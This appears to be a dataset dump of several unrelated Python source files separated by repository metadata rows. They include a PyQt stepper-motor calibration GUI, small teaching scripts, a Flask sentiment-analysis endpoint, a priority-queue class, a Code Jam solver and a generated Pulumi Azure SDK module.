            else:
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
        # Lock the GUI during the move; only the Stop button stays active.
        self.allButtons_torf(False)
        self.stopButton.setEnabled(True)
        self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
        self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
        self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
        self.get_zaber_Thread.start()
    def move_to_val2(self):
        """Move to the current guided-calibration target from self.y_local.

        Unlike move_to_val, the target is taken from the loaded target list
        (at self.calibCounter) rather than from a text field, so no user
        input validation is needed.  Locks the GUI and starts the worker.
        """
        if self.calib_mode=="wavelength":
            move_num = round(self.y_local[self.calibCounter],1)
            # Pause the auto-disconnect timer while the thread works.
            self.timer.stop()
            sender = self.sender()
            self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
        elif self.calib_mode=="slit":
            move_num = round(self.y_local[self.calibCounter],2)
            self.timer.stop()
            sender = self.sender()
            self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
        print move_num
        # Lock the GUI during the move; only the Stop button stays active.
        self.allButtons_torf(False)
        self.stopButton.setEnabled(True)
        self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
        self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
        self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
        self.get_zaber_Thread.start()
    def move_rel(self):
        """Move the stepper by a relative number of microsteps (moverelEdit).

        The resulting absolute position is checked against the valid
        microstep range for the active axis before the worker is started.
        """
        move_num = int(self.moverelEdit.text())
        if self.calib_mode=="wavelength":
            # Predict the absolute target so the range check can be done here.
            move_tot = move_num+self.all_pos[-1]
            if move_tot<self.Validrange_lambda[0] or move_tot>self.Validrange_lambda[1]:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength stepper range is from ',str(self.Validrange_lambda[0]),' to ',str(self.Validrange_lambda[1]),' microsteps.' ]) )
                return
            else:
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
        elif self.calib_mode=="slit":
            move_tot = move_num+self.all_pos[-1]
            if move_tot<self.Validrange_slit[0] or move_tot>self.Validrange_slit[1]:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit width stepper range is from ',str(self.Validrange_slit[0]),' to ',str(self.Validrange_slit[1]),' microsteps.' ]) )
                return
            else:
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
        # Lock the GUI during the move; only the Stop button stays active.
        self.allButtons_torf(False)
        self.stopButton.setEnabled(True)
        self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
        self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
        self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
        self.get_zaber_Thread.start()
    def move_abs(self):
        """Move the stepper to an absolute microstep position (moveabsEdit).

        The target is checked against the valid microstep range for the
        active axis before the worker thread is started.
        """
        move_num = int(self.moveabsEdit.text())
        if self.calib_mode=="wavelength":
            if move_num<self.Validrange_lambda[0] or move_num>self.Validrange_lambda[1]:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength stepper range is from ',str(self.Validrange_lambda[0]),' to ',str(self.Validrange_lambda[1]),' microsteps.' ]) )
                return
            else:
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
        elif self.calib_mode=="slit":
            if move_num<self.Validrange_slit[0] or move_num>self.Validrange_slit[1]:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit stepper range is from ',str(self.Validrange_slit[0]),' to ',str(self.Validrange_slit[1]),' microsteps.' ]) )
                return
            else:
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
        # Lock the GUI during the move; only the Stop button stays active.
        self.allButtons_torf(False)
        self.stopButton.setEnabled(True)
        self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
        self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
        self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
        self.get_zaber_Thread.start()
    def move_jog(self):
        """Jog the stepper by +/-10 microsteps via the arrow buttons.

        The direction is taken from the sender button's caption (up/down
        triangle); the predicted position is range-checked here, while the
        worker thread derives the actual step from the same caption.
        """
        sender = self.sender()
        # u'\u25b2' / u'\u25bc' are the up/down triangle button captions.
        if sender.text()==u'\u25b2':
            move_num=10
        elif sender.text()==u'\u25bc':
            move_num=-10
        ######################################
        if self.calib_mode=="wavelength":
            # update the lcd motorstep position
            validrange_min, validrange_max=self.Validrange_lambda
            move_tot = move_num+self.all_pos[-1]
            if move_tot<validrange_min or move_tot>validrange_max:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid range is from ',str(validrange_min),' to ',str(validrange_max),' microsteps.' ]) )
                return
            else:
                self.timer.stop()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str)
        if self.calib_mode=="slit":
            # update the lcd motorstep position
            validrange_min, validrange_max=self.Validrange_slit
            move_tot = move_num+self.all_pos[-1]
            if move_tot<validrange_min or move_tot>validrange_max:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid range is from ',str(validrange_min),' to ',str(validrange_max),' microsteps.' ]) )
                return
            else:
                self.timer.stop()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str)
        self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
        self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
        self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
        self.get_zaber_Thread.start()
def more_tals(self,more_tals_obj):
self.all_pos.extend([ int(more_tals_obj.min_pos) ])
self.lcd1.display(str(more_tals_obj.min_pos))
self.lcd2.display(str(more_tals_obj.pos_val))
    def bad_zaber_val(self,pyqt_object):
        """Store the error class reported by the worker; examined by set_finished."""
        self.bad_zaber_vals=pyqt_object
    def set_finished(self):
        """Worker-thread completion handler: react to errors, unlock the GUI.

        A SerialException from the worker terminates the program; a
        ValueError closes the serial connection.  Otherwise the controls
        are re-enabled and the 10-minute auto-disconnect timer restarted.
        """
        # Note: the comparisons are against the exception *classes* set by
        # bad_zaber_val, not instances.
        if self.bad_zaber_vals==serial.SerialException:
            QtGui.QMessageBox.warning(self, 'Message',"Zaber serial severed. Closing the program..." )
            sys.exit()
        self.stopButton.setEnabled(False)
        if self.bad_zaber_vals==ValueError:
            QtGui.QMessageBox.warning(self, 'Message',"Zaber getting bad values. Closing the serial..." )
            self.bad_zaber_vals=False
            self.set_disconnect()
            return
        self.allButtons_torf(True)
        self.timer.start(1000*60*10)
    def closeEvent(self, event):
        """Qt close handler: confirm quit and shut the hardware down cleanly.

        Refuses to close while a move thread is running; otherwise zeroes
        both hold currents, closes the serial port and stops the
        auto-disconnect timer before accepting the event.
        """
        if hasattr(self, 'Za'):
            reply = QtGui.QMessageBox.question(self, 'Message', "Quit calibration now? The microstep position will be saved and the stepper hold current will be set to zero!", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
        else:
            reply = QtGui.QMessageBox.question(self, 'Message', "Quit calibration now?", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
        if reply==QtGui.QMessageBox.Yes:
            if hasattr(self, 'Za'):
                if not hasattr(self, 'get_zaber_Thread'):
                    # No worker was ever started: just power down and close.
                    if self.Za.is_open():
                        self.Za.set_Hold_Current(1,1,0)
                        self.Za.set_Hold_Current(1,2,0)
                        self.Za.close()
                else:
                    if self.get_zaber_Thread.isRunning():
                        # A move is in flight: refuse to close.
                        QtGui.QMessageBox.warning(self, 'Message', "Calibration in progress. Cancel the move then quit!")
                        event.ignore()
                        return
                    else:
                        if self.Za.is_open():
                            self.Za.set_Hold_Current(1,1,0)
                            self.Za.set_Hold_Current(1,2,0)
                            self.Za.close()
            if hasattr(self, 'timer'):
                if self.timer.isActive():
                    self.timer.stop()
            event.accept()
        else:
            event.ignore()
    def set_save_plots(self):
        """Export the left plot scene as a PNG named after the session timestamp.

        The destination folder is taken from the GUI folder edit (created
        on demand); with an empty edit the image lands in the working dir.
        """
        if str(self.folderEdit.text()):
            if not os.path.isdir(str(self.folderEdit.text())):
                os.mkdir(str(self.folderEdit.text()))
            saveinfolder=''.join([str(self.folderEdit.text()),"/"])
        else:
            saveinfolder=""
        save_pic_to_file=''.join([saveinfolder,self.timestr,'.png'])
        # create an exporter instance, as an argument give it
        # the item you wish to export
        exporter = pg.exporters.ImageExporter(self.p0.scene())
        # set export parameters if needed
        #exporter.parameters()['width'] = 100 # (note this also affects height parameter)
        # save to file
        exporter.export(save_pic_to_file)
    def set_save(self):
        """Persist the current GUI state into config_zeiss.py and reload it.

        Each call rewrites specific (hard-coded) line numbers of the config
        module with the current paths, file names, serial ports and a fresh
        session timestamp, then reloads the module so the new values are
        visible immediately.
        """
        self.timestr=time.strftime("%y%m%d-%H%M")
        # Line numbers below are 0-based indexes into config_zeiss.py and
        # must stay in sync with that file's layout.
        self.replace_line("config_zeiss.py",4, ''.join(["Last_position_lambda=",str(config_zeiss.Last_position_lambda),"\n"]) )
        self.replace_line("config_zeiss.py",5, ''.join(["Last_position_slit=",str(config_zeiss.Last_position_slit),"\n"]) )
        self.replace_line("config_zeiss.py",7, ''.join(["calibfile_lambda=\"",self.calibfile_lambda_str,"\"\n"]) )
        self.replace_line("config_zeiss.py",8, ''.join(["calibfile_slit=\"",self.calibfile_slit_str,"\"\n"]) )
        self.replace_line("config_zeiss.py",9, ''.join(["lambdafile=\"",self.lambda_str,"\"\n"]) )
        self.replace_line("config_zeiss.py",10, ''.join(["slitfile=\"",self.slit_str,"\"\n"]) )
        self.replace_line("config_zeiss.py",11, ''.join(["calib_lambda_filename=\"",str(self.filenameEdit.text()),"\"\n"]) )
        self.replace_line("config_zeiss.py",12, ''.join(["calib_lambda_foldername=\"",str(self.folderEdit.text()),"\"\n"]) )
        self.replace_line("config_zeiss.py",13, ''.join(["calib_slit_filename=\"",str(self.filenameEdit.text()),"\"\n"]) )
        self.replace_line("config_zeiss.py",14, ''.join(["calib_slit_foldername=\"",str(self.folderEdit.text()),"\"\n"]) )
        self.replace_line("config_zeiss.py",17, ''.join(["timestr=\"",self.timestr,"\"\n"]) )
        self.replace_line("config_zeiss.py",18, ''.join(["zaberport=\"",self.zaberport_str,"\"\n"]) )
        self.replace_line("config_zeiss.py",19, ''.join(["sr510port=\"",self.sr510port_str,"\"\n"]) )
        self.lcd3.display(self.timestr)
        imp.reload(config_zeiss)
def replace_line(self,file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
def main():
    """Create the Qt application and run the calibration GUI event loop."""
    app=QtGui.QApplication(sys.argv)
    # Keep a reference to the window so it is not garbage collected.
    ex=Run_gui()
    #sys.exit(app.exec_())
    # avoid message 'Segmentation fault (core dumped)' with app.deleteLater()
    app.exec_()
    app.deleteLater()
    sys.exit()
if __name__=='__main__':
    main()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
5ed6ab127cba5918dd12490bf579baafac9dc250 | 1fa262359f91768f1b98c45944fd4a63645f4567 | /variable_examples.py | 03bd0c75fcb7f7afb46ffb09f440a337d5d26ae4 | [] | no_license | feleHaile/20190225KAPL | d1a95dd6632ba83b6cd3380d92e2a2a18a5a4942 | 3957c1d738cc3e42d5dac0fb4a6f6071a1bb391a | refs/heads/master | 2020-05-15T22:31:51.881632 | 2019-02-28T20:11:29 | 2019-02-28T20:11:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | #!/usr/bin/env python
# Demonstration of Python name binding, aliasing and dynamic typing.
# The observable behaviour of this script is its exact print sequence,
# so the statements are left untouched.
x = 5
print(x)
y = x  # y is bound to the same int object as x (y is not used again)
things = [1, 2, 3]
t = things  # aliasing: t and things now name the SAME list object
print(t)
t.append(42)  # mutating through t ...
print(things)  # ... is visible through things as well
print(t is things)  # identity check -> True
print(id(t), id(things))  # same object id twice
print(type(x), type(t), type(type), type('spam'))
t = 42  # rebinding t does not affect things
print(type(t))
t = "amazon"  # names can be rebound to any type
print(type(t))
m = None
print(m)
"jstrickler@gmail.com"
] | jstrickler@gmail.com |
3ae000d112d57efb42e387fa72728765b02c3bdd | 3bb79d8362510e56102fdac19db394c29f367ca2 | /pytensor/tutorial/part1/linear.py | 2194cc9a749cc2ef0369a34de6f6a5f5c888cd99 | [
"MIT"
] | permissive | shuida/pytensor | 94225d37fad02bda5d9724443c15a055f9b1cc13 | d00d188dcc2da12d43afa749b3b23dd27e42698d | refs/heads/master | 2020-04-15T20:53:23.951523 | 2018-04-19T01:37:17 | 2018-04-19T01:37:17 | 165,011,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,435 | py | from pytensor.ops.math_ops import *
from pytensor.ops.loss_ops import *
from pytensor.tutorial.part1.trainer import *
from sklearn.datasets import load_digits
from sklearn.model_selection import train_test_split
class LinearModel:
def __init__(self, input_size, output_size):
"""
a simple linear model: y = w*x
:param input_size:
:param output_size:
"""
# initialize size
self.input_size = input_size
self.output_size = output_size
# initialize parameters
self.parameter = Parameter()
self.W = self.parameter.get_variable('weight', [self.input_size, self.output_size])
# ops and loss
self.matmul = Matmul()
self.loss_ops = SoftmaxLoss()
def forward(self, input_variable):
output_variable = self.matmul.forward([input_variable, self.W])
self.loss_ops.forward(output_variable)
return output_variable
def loss(self, target_variable):
loss_val = self.loss_ops.loss(target_variable)
return loss_val
def backward(self):
self.loss_ops.backward()
self.matmul.backward()
if __name__ == '__main__':
digits = load_digits()
digits.data /= 16.0
x_train, x_test, y_train, y_test = train_test_split(digits.data, digits.target)
model = LinearModel(64, 10)
trainer = Trainer(model)
trainer.train(x_train, y_train, x_test, y_test) | [
"lixinjian1217@gmail.com"
] | lixinjian1217@gmail.com |
dfc536d6b9c2abe4658a89ae31ea382458fc2581 | ff1e70a47a5adfb34b9ba75a41298623844b7b85 | /bookingsapp/serializers.py | 56f42aef3f92044ef4d971bd8dbe42b197cc0b9e | [] | no_license | guptais/django-rest-api | 636307c97d2e2ff3fe44e5eeb16a0fd7e381ece7 | d271f7ff8005d47e1a1da2c1a809d22605c576e5 | refs/heads/master | 2023-03-07T22:37:47.838503 | 2021-02-20T09:28:53 | 2021-02-20T09:28:53 | 340,613,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from rest_framework import serializers
from .models import BookingModel, RoomModel
class BookingSerializer(serializers.ModelSerializer):
    """DRF model serializer exposing the public fields of a room booking."""
    class Meta:
        model = BookingModel
        # 'from_Date' capitalisation follows the model field name -- TODO confirm.
        fields = ['id', 'from_Date', 'to_date', 'number_of_rooms', 'price']
"15913179+guptaisha5484@users.noreply.github.com"
] | 15913179+guptaisha5484@users.noreply.github.com |
a8cfde36a731a0cfeb460159e2cc73d43db7c46e | 101d866f8e2f84dc8f76181341180c13b38e0ecf | /case/Demo/test_global_init.py | 96c3320be20e782b490bbf14bbb0cf12cef8b2c5 | [] | no_license | cming091/autotest | 1d9a6f5f750c04b043a6bc45efa423f2e730b3aa | 0f6fe31a27de9bcf0697c28574b97555fe36d1e1 | refs/heads/master | 2023-06-02T18:22:24.971786 | 2021-06-21T08:52:47 | 2021-06-21T08:52:47 | 378,858,969 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # coding=utf-8
import pytest
import allure
from case.base import TestBase
@allure.feature('测试初始化全局数据')
@allure.link(url="https://pages/viewpage.action?pageId=84191585", name="测试用例")
@pytest.mark.usefixtures("init_module_data")
@pytest.mark.usefixtures("init_global_data")
class TestGlobalDataInit(TestBase):
    """test global data init

    Demo suite exercising the ``init_global_data``/``init_module_data``
    fixtures; the class-level ``usefixtures`` marks apply them to every
    test method below.
    """

    @allure.story("1.第一步")
    def test_step_one(self, request):
        # Passes as long as the fixtures initialise without raising.
        print('test step one...done')

    def test_step_two(self, request):
        print('test step two...done')
        # Always fails (1 != 2) -- presumably deliberate, to demonstrate a
        # failing step in the allure report; confirm before "fixing".
        assert 1 == 2

    def test_step_three(self, request):
        print('test step three... done')
| [
"349152234@qq.com"
] | 349152234@qq.com |
4cc1d2f8e739cec0560cfb768c14d5dc62a9a459 | 87f59e1f3db5598c2caebe80a78c2c4ca29ab0f9 | /bg_simulation/card/__init__.py | 74372617fac58065bf31558f3928be44ff5af27c | [] | no_license | kdchoi-mkt/battleground-simulation | 71477fadc7efd684c212b21fc91a53628b20a131 | 79251a8a345c989b41380b39aa2623c75ec67d16 | refs/heads/master | 2023-08-04T17:08:47.399102 | 2021-09-05T09:41:16 | 2021-09-05T09:41:16 | 403,029,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | from .Card import Card
| [
"kdchoi_mkt@kaist.ac.kr"
] | kdchoi_mkt@kaist.ac.kr |
de0b0b059a80c07749a16ea129918524290a5f28 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/David.Liu/q3.py | a26e4881ffe0696d7c67a6a0d0631ed73764fc4d | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 866 | py | import math
# Search parameters: 32-digit candidates; stop after emitting 500 results.
n=32
x=500
outf=open("q3large.out","w")  # output file for "coin divisor*9" rows
def factor(num, limit=500):
    """Return the smallest divisor of ``num`` in [2, limit), or -1 if none.

    Used to find a nontrivial-divisor witness for each base interpretation
    of a candidate "jamcoin".  ``limit`` generalizes the original
    hard-coded local bound of 500 (default preserves old behavior).
    """
    for i in range(2, limit):
        if num % i == 0:
            return i
    return -1
def makelist(n):
    """Collect one small divisor per base-2..10 interpretation of ``n``.

    Stops early (returning a short list) as soon as one interpretation has
    no divisor below the search bound; callers check ``len(...) == 9``.
    """
    divisors = []
    for base in range(2, 11):
        value = 0
        # Horner's rule: same number as sum(digit * base**position).
        for digit in n:
            value = value * base + int(digit)
        witness = factor(value)
        if witness == -1:
            break
        divisors.append(witness)
    return divisors
def f(n, k):
    """Recursively enumerate the middle bits of a jamcoin candidate.

    ``k`` is the digit prefix built so far (starting from the leading "1");
    ``n`` middle positions remain before the trailing "1" is appended.
    Writes each valid coin plus its 9 divisor witnesses to ``outf`` and
    hard-stops the program via ``exit()`` once the global countdown ``x``
    reaches zero.
    """
    if n==0:
        # Candidate complete: valid only if every base 2..10 interpretation
        # has a small divisor (makelist returns exactly 9 witnesses then).
        l=makelist(k+"1")
        if len(l)==9:
            outf.write(k+"1")
            for p in l:
                outf.write(" "+str(p))
            outf.write("\n")
            global x
            x=x-1  # countdown of results still needed
            print(x)
            if x==0:
                outf.close()
                exit()  # enough jamcoins emitted; stop the whole search
    else:
        # Try both bit values for the next middle position.
        f(n-1, k+"0")
        f(n-1, k+"1")
# Kick off the search: first and last digits are fixed "1", leaving n-2 free.
f(n-2, "1")
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
633a614ee0db510056cd958a7c80c9535fcae420 | fbf77a57d68060c60fe8e39a85ed541768b041a2 | /rest/mydjangoenv/lib/python3.7/functools.py | aad2d84cc0aae30011bd764df4d6c354c9d6b546 | [] | no_license | shlokagarwal/kharche | c4e78dc47f96c796b9d8960b659ac548ee3c8305 | 12d24e4bdea5ed2adabdb082397a516017e6cb2d | refs/heads/master | 2020-09-14T13:16:47.284264 | 2019-11-22T11:13:09 | 2019-11-22T11:13:09 | 223,136,552 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /Users/shlokagarwalla/anaconda3/lib/python3.7/functools.py | [
"skagarwal.usa@gmail.com"
] | skagarwal.usa@gmail.com |
091f1500145668ea72376cd73fea7d27b8c05ab9 | 71c395d3bc7935198ff7063593b215fc07d68912 | /N_Tiles/Frontier.py | b49883ac09d4f21ee7bdd82683598edb1cd5466a | [] | no_license | tico2303/AI | eacc13917530864d604cb73f4635f994caa9bed5 | 19d8591e9ce4757f754c959ac9c5a1e7f5df25ef | refs/heads/master | 2020-05-23T08:01:01.960184 | 2017-03-02T20:02:20 | 2017-03-02T20:02:20 | 80,486,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | import bisect
class Frontier(object):
    """Abstract search frontier; subclasses choose the ordering policy."""

    def __init__(self):
        # Underlying container shared by all frontier implementations.
        self.q = []

    def is_empty(self):
        pass

    def pop(self):
        pass

    def push(self):
        # NOTE(review): subclasses (e.g. PriorityQue) accept a ``node``
        # argument here; stub signature kept for backward compatibility.
        pass


class PriorityQue(Frontier):
    """Frontier kept sorted ascending; pop() returns the smallest element."""

    def __iter__(self):
        for el in self.q:
            yield el

    def find_element(self, el):
        """Return the stored element equal to ``el``, or None if absent.

        Bug fix: the original returned None after inspecting only the
        first element (its ``else: return None`` was attached to the
        ``if`` inside the loop); now the whole queue is scanned.
        """
        for i in self.q:
            if i == el:
                return i
        return None

    def index(self, el):
        return self.q.index(el)

    def __getitem__(self, index):
        return self.q[index]

    def __setitem__(self, index, value):
        self.q[index] = value

    def __len__(self):
        return len(self.q)

    def __contains__(self, key):
        return key in self.q

    def is_empty(self):
        if self.q:
            return False
        else:
            return True

    def pop(self):
        # Smallest element lives at the front of the sorted list.
        return self.q.pop(0)

    def push(self, node):
        # Insert in sorted position: O(log n) search plus O(n) shift,
        # cheaper in practice than re-sorting after every insert.
        bisect.insort(self.q, node)

    def front(self):
        """Peek at the smallest element without removing it."""
        return self.q[0]
| [
"tico82003@gmail.com"
] | tico82003@gmail.com |
c57d2a70d066ddda6610a3b4c293c98a939d45c0 | 217a2bf11f99ebab761037ca3362d7d637d15093 | /Sentiment-Analyzer/appV(0.1).py | e2d0ff756be7ea28731094b95fe6beb760ab279f | [] | no_license | SiddhantPamnani/Machine-Learning | 3e4af8c20ffbff6324ed4e0c9968b10298f4bf50 | 75222b542ec9e480336f7044520bc653227f1b09 | refs/heads/main | 2023-04-18T12:26:23.557902 | 2021-04-19T12:59:18 | 2021-04-19T12:59:18 | 359,431,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,911 | py | from flask import Flask,request, jsonify
import json
from flask_cors import CORS, cross_origin
from keras.models import load_model
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing import sequence
import json
import warnings
import pickle
app = Flask(__name__)
CORS(app)
# Allow cross-origin requests from any origin on every route (dev setup;
# lock down origins before production).
cors = CORS(app, resources={
    r"/*": {
        "origins": "*"
    }
})
@app.route('/post/', methods=['POST'])
@cross_origin()
def post_something():
    """Classify the sentiment of the posted text.

    Expects JSON ``{"data": "<text>"}``; returns
    ``{"sentiment": "Positive"|"Negative", "proba": "<confidence>"}``.

    NOTE(review): the Keras model and tokenizer are reloaded from disk on
    every request -- presumably fine for a demo, but they should be loaded
    once at startup for real traffic.
    """
    if request.method == 'POST':
        data = request.json['data']
        print("Data::",data)
        print("Loading Model")
        model = load_model('tweet_model2.h5')
        print("LOADING TOKENIZER")
        with open('tweet_tokenizer2.pickle', 'rb') as f:
            tokenizer = pickle.load(f)
        # The triple-quoted string below is a disabled legacy vectorization
        # path (manual ranked-vocab lookup); kept verbatim, not executed.
        '''
        with open('ranked_vocab.json') as f:
            ranked_vocab = json.load(f)
        final_vector=[]
        for i in data.split():
            i = i.lower()
            if i in ranked_vocab:
                final_vector.append(ranked_vocab[i])
            else:
                final_vector.append(0)
        max_review_length = 600
        final_vector = sequence.pad_sequences([final_vector], maxlen=max_review_length)
        '''
        sequences = tokenizer.texts_to_sequences([data])
        print("LEN_SEQ::",len(sequences))
        data = pad_sequences(sequences, maxlen=50)
        print("LEN_DATA::",len(data))
        prob = model.predict(data)
        print("PROBABILITY::",prob)
        # Assumes the model emits a single sigmoid probability of the
        # positive class -- TODO confirm against the training script.
        if prob[0][0] > 0.5:
            sentiment = "Positive"
            proba = prob[0][0]
        else:
            sentiment = "Negative"
            proba = 1 - prob[0][0]
        response = {'sentiment':sentiment, 'proba':str(proba)}
        response = jsonify(response)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
| [
"sidpspotter@gmail.com"
] | sidpspotter@gmail.com |
eb5b33dc0fc012d521bf71c982068b71534887b6 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/sql/get_database_vulnerability_assessment.py | a6aa84ede40a8f73706d9941a81575ccf9b1a66e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,722 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetDatabaseVulnerabilityAssessmentResult',
'AwaitableGetDatabaseVulnerabilityAssessmentResult',
'get_database_vulnerability_assessment',
]
@pulumi.output_type
class GetDatabaseVulnerabilityAssessmentResult:
"""
A database vulnerability assessment.
"""
def __init__(__self__, id=None, name=None, recurring_scans=None, storage_account_access_key=None, storage_container_path=None, storage_container_sas_key=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if recurring_scans and not isinstance(recurring_scans, dict):
raise TypeError("Expected argument 'recurring_scans' to be a dict")
pulumi.set(__self__, "recurring_scans", recurring_scans)
if storage_account_access_key and not isinstance(storage_account_access_key, str):
raise TypeError("Expected argument 'storage_account_access_key' to be a str")
pulumi.set(__self__, "storage_account_access_key", storage_account_access_key)
if storage_container_path and not isinstance(storage_container_path, str):
raise TypeError("Expected argument 'storage_container_path' to be a str")
pulumi.set(__self__, "storage_container_path", storage_container_path)
if storage_container_sas_key and not isinstance(storage_container_sas_key, str):
raise TypeError("Expected argument 'storage_container_sas_key' to be a str")
pulumi.set(__self__, "storage_container_sas_key", storage_container_sas_key)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="recurringScans")
def recurring_scans(self) -> Optional['outputs.VulnerabilityAssessmentRecurringScansPropertiesResponse']:
"""
The recurring scans settings
"""
return pulumi.get(self, "recurring_scans")
@property
@pulumi.getter(name="storageAccountAccessKey")
def storage_account_access_key(self) -> Optional[str]:
"""
Specifies the identifier key of the storage account for vulnerability assessment scan results. If 'StorageContainerSasKey' isn't specified, storageAccountAccessKey is required.
"""
return pulumi.get(self, "storage_account_access_key")
@property
@pulumi.getter(name="storageContainerPath")
def storage_container_path(self) -> Optional[str]:
"""
A blob storage container path to hold the scan results (e.g. https://myStorage.blob.core.windows.net/VaScans/). It is required if server level vulnerability assessment policy doesn't set
"""
return pulumi.get(self, "storage_container_path")
@property
@pulumi.getter(name="storageContainerSasKey")
def storage_container_sas_key(self) -> Optional[str]:
"""
A shared access signature (SAS Key) that has write access to the blob container specified in 'storageContainerPath' parameter. If 'storageAccountAccessKey' isn't specified, StorageContainerSasKey is required.
"""
return pulumi.get(self, "storage_container_sas_key")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetDatabaseVulnerabilityAssessmentResult(GetDatabaseVulnerabilityAssessmentResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDatabaseVulnerabilityAssessmentResult(
id=self.id,
name=self.name,
recurring_scans=self.recurring_scans,
storage_account_access_key=self.storage_account_access_key,
storage_container_path=self.storage_container_path,
storage_container_sas_key=self.storage_container_sas_key,
type=self.type)
def get_database_vulnerability_assessment(database_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
server_name: Optional[str] = None,
vulnerability_assessment_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDatabaseVulnerabilityAssessmentResult:
"""
A database vulnerability assessment.
API Version: 2020-08-01-preview.
